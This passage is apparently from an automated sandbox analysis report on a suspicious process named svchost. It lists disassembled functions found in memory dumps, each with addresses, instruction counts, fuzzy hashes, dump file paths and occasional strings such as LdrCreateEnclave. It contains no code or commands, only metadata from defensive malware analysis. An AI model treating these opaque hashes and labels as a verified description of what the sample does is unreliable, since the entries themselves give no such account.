                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PreferredUILanguages
                                                                                                                      • API String ID: 0-1884656846
                                                                                                                      • Opcode ID: aee1d242684625c412477e2a527a20e4bf2a1195ce31f497a0544a244aea48b0
                                                                                                                      • Instruction ID: 2c7512e3ae65c8076ec4675b0028f20091004490d19d93e19555d8d46d09e526
                                                                                                                      • Opcode Fuzzy Hash: aee1d242684625c412477e2a527a20e4bf2a1195ce31f497a0544a244aea48b0
                                                                                                                      • Instruction Fuzzy Hash: 9F41C136D04229ABDB22DA94CCC1BEEF7BDAF44710F050166E951AB294D6B4DE40C7A0
                                                                                                                      Function 033AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      • API String ID: 0-2202222882
                                                                                                                      • Opcode ID: af16cd9807dd7293274b292be7639a557ad09707e626c63f1fd6599e41d640ae
                                                                                                                      • Instruction ID: 6a0abb6277a7d1d78a9ada78b1130b52e1107ea0f04a06acc85128e9de46b1e7
                                                                                                                      • Opcode Fuzzy Hash: af16cd9807dd7293274b292be7639a557ad09707e626c63f1fd6599e41d640ae
                                                                                                                      • Instruction Fuzzy Hash: 47412DB6D0162CAADB21DB64CCC4FDEB77CEB45714F0045A5AA08EB140DB749E898BA4
                                                                                                                      Function 033B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: verifier.dll
                                                                                                                      • API String ID: 0-3265496382
                                                                                                                      • Opcode ID: be06353c9683194c917300ef39e643e04730b41c10971531b5e6453bf41dc2c9
                                                                                                                      • Instruction ID: 5e1a9dd0b63f9acd6436e6fd95b3aef2149cea0264f99c4e4223e16712a3a565
                                                                                                                      • Opcode Fuzzy Hash: be06353c9683194c917300ef39e643e04730b41c10971531b5e6453bf41dc2c9
                                                                                                                      • Instruction Fuzzy Hash: E1317575A003019FDB24DF699C90BB6B7F5EB49711F98407AE709DF681E7318C808754
                                                                                                                      Function 03335096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx
                                                                                                                      • API String ID: 0-89312691
                                                                                                                      • Opcode ID: 8fb9e78eba9ae08eaa425be8222f5d4de27ed77a51cf102d501708d0508582c6
                                                                                                                      • Instruction ID: 12b2a6507c16cd9be3f898499b0fd47115356b7ce2f2a5c23c90e3824398b163
                                                                                                                      • Opcode Fuzzy Hash: 8fb9e78eba9ae08eaa425be8222f5d4de27ed77a51cf102d501708d0508582c6
                                                                                                                      • Instruction Fuzzy Hash: D01151317496028BFB28C91D8CD06B6B2D9EB97264F38C52AE452CB7A1D67AD8418780
                                                                                                                      Function 033B106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrCreateEnclave
                                                                                                                      • API String ID: 0-3262589265
                                                                                                                      • Opcode ID: ce4f46861c9204fbf1cd66baaa2d594578a82018b56c7585718e9d847a2b5af8
                                                                                                                      • Instruction ID: 2a621f0d180b5abc3663931113a38813f083eda4d31af92ee172be18f51b0188
                                                                                                                      • Opcode Fuzzy Hash: ce4f46861c9204fbf1cd66baaa2d594578a82018b56c7585718e9d847a2b5af8
                                                                                                                      • Instruction Fuzzy Hash: C12107B59183449FC320DF1AD884A9BFBF8EBD5B00F504A1EF6A49B250D7B49505CB92
                                                                                                                      Function 0336E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7130a386caa42c6216d1e61face383a1263f6230e02f56f4399ed1e7f1553f92
                                                                                                                      • Instruction ID: ed5bcd696c74b45b8f59407b6cbf2b58d1059d01c95d2ec003a8c0b67a44b9a2
                                                                                                                      • Opcode Fuzzy Hash: 7130a386caa42c6216d1e61face383a1263f6230e02f56f4399ed1e7f1553f92
                                                                                                                      • Instruction Fuzzy Hash: 81823472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                                                      Function 0337516C Relevance: .8, Instructions: 785COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1d1593a700784f9a609f0936491a20609c29fee14848aac704109e79d6631d41
                                                                                                                      • Instruction ID: 2ca5e52c71c22e659c4cc8f08dc8d5f70b08a804520f3e952766ca268bbcd0f1
                                                                                                                      • Opcode Fuzzy Hash: 1d1593a700784f9a609f0936491a20609c29fee14848aac704109e79d6631d41
                                                                                                                      • Instruction Fuzzy Hash: F562923290464AAFEF39CF08D8D05AEFB66FE56314B49C59CC89A27604D335B944CBD1
                                                                                                                      Function 0338739A Relevance: .7, Instructions: 705COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e7abd7717b6bc3c76dd1249471627e5e1d4b58978d2b940ad7e801f7402dd060
                                                                                                                      • Instruction ID: d0435985fce192189019deef3303b41b258e535ce181b79104c04728a8eb4573
                                                                                                                      • Opcode Fuzzy Hash: e7abd7717b6bc3c76dd1249471627e5e1d4b58978d2b940ad7e801f7402dd060
                                                                                                                      • Instruction Fuzzy Hash: 41428E75A007168FDB19DF59C8C0ABEF7B6FF88314B288569E552AB340D734E842CB90
                                                                                                                      Function 03385AA0 Relevance: .7, Instructions: 652COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                      • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                      Function 0335B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b4a8014e2171d9ac2e69b5b9b600a8e64d5e27e699f590a5fdfabe4778c59430
                                                                                                                      • Instruction ID: f99fd4810c0044f8b82a432d40e9a3352bf729eedc7e4372929c858a36afae01
                                                                                                                      • Opcode Fuzzy Hash: b4a8014e2171d9ac2e69b5b9b600a8e64d5e27e699f590a5fdfabe4778c59430
                                                                                                                      • Instruction Fuzzy Hash: 083279B6E01219DBCF24DFA8C894BAEFBB5FF54714F180029E805AB391E7759941CB90
                                                                                                                      Function 033C8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8805995d0554f6094f879d490444cf323c9aa612f6eb3fc009db86d631c8db75
                                                                                                                      • Instruction ID: 6093f89ff18251a3e2254b4fe2b00afd9612a5a271f94a681b46a1b04c6fabfa
                                                                                                                      • Opcode Fuzzy Hash: 8805995d0554f6094f879d490444cf323c9aa612f6eb3fc009db86d631c8db75
                                                                                                                      • Instruction Fuzzy Hash: F1423775E102599FDB24CF69C881BADF7F5BF88301F188099E949AB241D734AE85CF60
                                                                                                                      Function 03342840 Relevance: .6, Instructions: 605COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 189f13cb8b226c6defb1a6338444ca10833e2739c953285a0edcd1270d4d26c1
                                                                                                                      • Instruction ID: 1e21a2c986fe86d024503214d2209dcc6cc2f6355e230502970ea7d9600d8486
                                                                                                                      • Opcode Fuzzy Hash: 189f13cb8b226c6defb1a6338444ca10833e2739c953285a0edcd1270d4d26c1
                                                                                                                      • Instruction Fuzzy Hash: CF32EC34A05715CFEF24CF69C885BBEFBF6AF84310F18455AE486AB684D734A841CB50
                                                                                                                      Function 033DA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 58bc926396ff9ce655c326865d2327318fbd4b46a8b37a417849cebd6e581dd9
                                                                                                                      • Instruction ID: 69d1f58607880cbcfec9f85b3f506d47aa1a2ed6ee35eee1cfbb8bc2ea4de366
                                                                                                                      • Opcode Fuzzy Hash: 58bc926396ff9ce655c326865d2327318fbd4b46a8b37a417849cebd6e581dd9
                                                                                                                      • Instruction Fuzzy Hash: 4522EF76604651CFDB25CF29EAD0372B7F5AF44300F0C849AE8968FA85E735E592CB60
                                                                                                                      Function 033F16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f3dd0b92ceb94616e016a9c0ae9ddbf5a31914fb1fd6acc7617bf9efec08f658
                                                                                                                      • Instruction ID: 8c6e6ffba6674d1db4eec68aa5c2583b9bdd63508565c972aa8affb80f63d77b
                                                                                                                      • Opcode Fuzzy Hash: f3dd0b92ceb94616e016a9c0ae9ddbf5a31914fb1fd6acc7617bf9efec08f658
                                                                                                                      • Instruction Fuzzy Hash: 9922B035E00216CFCB19CF59D8D0AAAF3F6BF88314B58456DDA56EB344DB34A941CB90
                                                                                                                      Function 0335FB80 Relevance: .6, Instructions: 559COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4a6725ad0f64a965e35a93513d534915971a62d1e2c026e011f6f5659d3ab049
                                                                                                                      • Instruction ID: 3608366f1acd44f5237bc268fcfbf33865b10b5d661c318a619993aee6fdf1a8
                                                                                                                      • Opcode Fuzzy Hash: 4a6725ad0f64a965e35a93513d534915971a62d1e2c026e011f6f5659d3ab049
                                                                                                                      • Instruction Fuzzy Hash: 5B227F75D00609EFDB18DFA8C8C4BAEB7B9FF44310F1485A9E814AB245E734EA45CB90
                                                                                                                      Function 033F1D5A Relevance: .6, Instructions: 559COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e75108170c5c82d8ab81790d66b4d9f73675d10fc0f59499e9d112244ab09e74
                                                                                                                      • Instruction ID: 01e052311d74fe45513f173b7c4dcfbe878f2d8d28dafb56a8895d765e06f563
                                                                                                                      • Opcode Fuzzy Hash: e75108170c5c82d8ab81790d66b4d9f73675d10fc0f59499e9d112244ab09e74
                                                                                                                      • Instruction Fuzzy Hash: 31226D39A04712DFC718CF19C8D0A2AB3E5FF89314B984A6DE696CB351D734E846CB91
                                                                                                                      Function 03358DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5434b892dd47f73d536e42e9cc64234a9dae1bb8aa8ed8b0536e7bbecd2ff32f
                                                                                                                      • Instruction ID: 42bf7362429a1149c0c63dfdd97c1401ee2b28dba778a62516a0fecb660b0d39
                                                                                                                      • Opcode Fuzzy Hash: 5434b892dd47f73d536e42e9cc64234a9dae1bb8aa8ed8b0536e7bbecd2ff32f
                                                                                                                      • Instruction Fuzzy Hash: EE223F74E00216DBDF14CF55C8C1ABEFBF6BF48704B58859AE8459B251E734D981CB60
                                                                                                                      Function 033F2446 Relevance: .5, Instructions: 485COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 72892e25ef9f8423986bc03b774fd5dd61bde7262f2ea59d19e919eebb20ff31
                                                                                                                      • Instruction ID: 2ea96aeb65c64164bcec6c85e9b8f1cb5fa56081c8e9521fdc3ff5436901004b
                                                                                                                      • Opcode Fuzzy Hash: 72892e25ef9f8423986bc03b774fd5dd61bde7262f2ea59d19e919eebb20ff31
                                                                                                                      • Instruction Fuzzy Hash: BC02F238A00651CFD724CF2AC8D0277F7F1AF45301B99899AEA96DF682D734D846DB60
                                                                                                                      Function 0340B16B Relevance: .4, Instructions: 450COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9788ac3e4de563766b81b99bb16cf1b9ad797579dcde9114a7a86984f51727d5
                                                                                                                      • Instruction ID: 9292a57d918cd4352a349eb29594fb0d2dfcc6a20b59407fdfa43613a4a9c99e
                                                                                                                      • Opcode Fuzzy Hash: 9788ac3e4de563766b81b99bb16cf1b9ad797579dcde9114a7a86984f51727d5
                                                                                                                      • Instruction Fuzzy Hash: AFF1B372F006159BCB18CEA9C99467EFBF5EB88210719417ED466EF3C0D634EA41CB98
                                                                                                                      Function 0040FF73 Relevance: .4, Instructions: 435COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cf976bde142915ee2b9486185ade116572eb830f964a7e06af1f9b950f649bfd
                                                                                                                      • Instruction ID: bc3dc1c74e1b29bd7803e655d61e04224c72a0e6528a9659707e5c9b927de1d7
                                                                                                                      • Opcode Fuzzy Hash: cf976bde142915ee2b9486185ade116572eb830f964a7e06af1f9b950f649bfd
                                                                                                                      • Instruction Fuzzy Hash: C5026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                                      Function 0340A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e09c3d5abb65ea128323f30f1b047d47aa426fb8b1aa9a669a7b4096b1948313
                                                                                                                      • Instruction ID: 4ec2f2bb32b8a0b686faa50ec9e119174c06095db943ad6ea5b443694672a574
                                                                                                                      • Opcode Fuzzy Hash: e09c3d5abb65ea128323f30f1b047d47aa426fb8b1aa9a669a7b4096b1948313
                                                                                                                      • Instruction Fuzzy Hash: D5F18372E006269BCB18CE69C5A05BEFBF5AF45210719427AD866EF3C0D734EE41CB94
                                                                                                                      Function 0335FDC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fc69e3c3121838d28714afcba5c6a9eb6dc6b00fbd28881b8f054427bb3fcfa4
                                                                                                                      • Instruction ID: b7e1d1d4ad1910fb4195304a2a7d6314ff8eb0ad727feb99555264f46bafa148
                                                                                                                      • Opcode Fuzzy Hash: fc69e3c3121838d28714afcba5c6a9eb6dc6b00fbd28881b8f054427bb3fcfa4
                                                                                                                      • Instruction Fuzzy Hash: E1F16D74E00609DFDB18DFA8C9C0AAEB7B5FF48304F1885A9E815EB255E734DA45CB90
                                                                                                                      Function 03328397 Relevance: .4, Instructions: 380COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8ce07132e3a4a19ad0a5189953003609f4599a7444a97544e9f15a817e0bd026
                                                                                                                      • Instruction ID: d9e5b3aeb9126de42d367d34df8d9f6e2e750ac84a6b388ba79fcbf2ba709702
                                                                                                                      • Opcode Fuzzy Hash: 8ce07132e3a4a19ad0a5189953003609f4599a7444a97544e9f15a817e0bd026
                                                                                                                      • Instruction Fuzzy Hash: E6D1B075A0072A9BCF14DF68CCD0ABABBA9BF44304F184669F916DF680E734E945CB50
                                                                                                                      Function 0335C6E0 Relevance: .4, Instructions: 367COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f4056339163d7a801b9d5e96aaf1b0be6e145f16379b75a7dd0ab3514c8b4554
                                                                                                                      • Instruction ID: 5dcbdf6997570ca93ece33bdda3cd39f5f9a3b165fb85c663831afb3b4fcbb98
                                                                                                                      • Opcode Fuzzy Hash: f4056339163d7a801b9d5e96aaf1b0be6e145f16379b75a7dd0ab3514c8b4554
                                                                                                                      • Instruction Fuzzy Hash: 23D16E75E043198BDF28CE98C9C4BBDBBB5FB44309F18A06AFC42A7695D7748941CB44
                                                                                                                      Function 033438E0 Relevance: .3, Instructions: 349COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5dbdd2868634321b806ad5b8c64a697d244e39ae131d8cc71d78c2c3a2d66855
                                                                                                                      • Instruction ID: a43ddf10269505084322d1d2254aa0d529bd0b03855ff2dd89790d32f9ee2a83
                                                                                                                      • Opcode Fuzzy Hash: 5dbdd2868634321b806ad5b8c64a697d244e39ae131d8cc71d78c2c3a2d66855
                                                                                                                      • Instruction Fuzzy Hash: C9E18D75A00205CFDB18CF59C880BAAF7F5FF58320F29819AE855AB791D734E951CBA0
                                                                                                                      Function 0334CFE0 Relevance: .3, Instructions: 345COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 46d5737ddc9b4cd906aa18bf80f61e89d39bb228a0eb59ad643cc2a55094b8f8
                                                                                                                      • Instruction ID: 578ba0daf51ba68fff9621988ac18e1a01b7b18092c81b47fc1bad64059659d4
                                                                                                                      • Opcode Fuzzy Hash: 46d5737ddc9b4cd906aa18bf80f61e89d39bb228a0eb59ad643cc2a55094b8f8
                                                                                                                      • Instruction Fuzzy Hash: FFD19130A003298FEB64DB25CCD4BAAF7F5AB49304F0840E9D909AB242DB74BD85CF51
                                                                                                                      Function 0333D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7b03a671a77235375cf45c85b524db469191d2a4f2b6eeb02aac8c5d350af1ca
                                                                                                                      • Instruction ID: 86f766a84e62825786f8bddaeb622bb60e6c285b5a840c24ccf5061d5c8c3470
                                                                                                                      • Opcode Fuzzy Hash: 7b03a671a77235375cf45c85b524db469191d2a4f2b6eeb02aac8c5d350af1ca
                                                                                                                      • Instruction Fuzzy Hash: 44C1A275E00215DBEF28CF5ACC80BAEF7B5EF55310F18C26AD815AB290D774A942CB80
                                                                                                                      Function 033B8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                      • Instruction ID: e441862b4806a91191b1824f5c6dd5e4d248e7237345c4cfe7783f60f4bf90b8
                                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                      • Instruction Fuzzy Hash: E0B13078A01644AFDB24DF95C980AEBB7BDFF84304F144469AA429FB91DA34E945CB10
                                                                                                                      Function 03340535 Relevance: .3, Instructions: 300COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction ID: 9bccebce93a94ff3d775cc8cece0a01de31fc66fb7d93c8ebd2a0bea5034f36d
                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
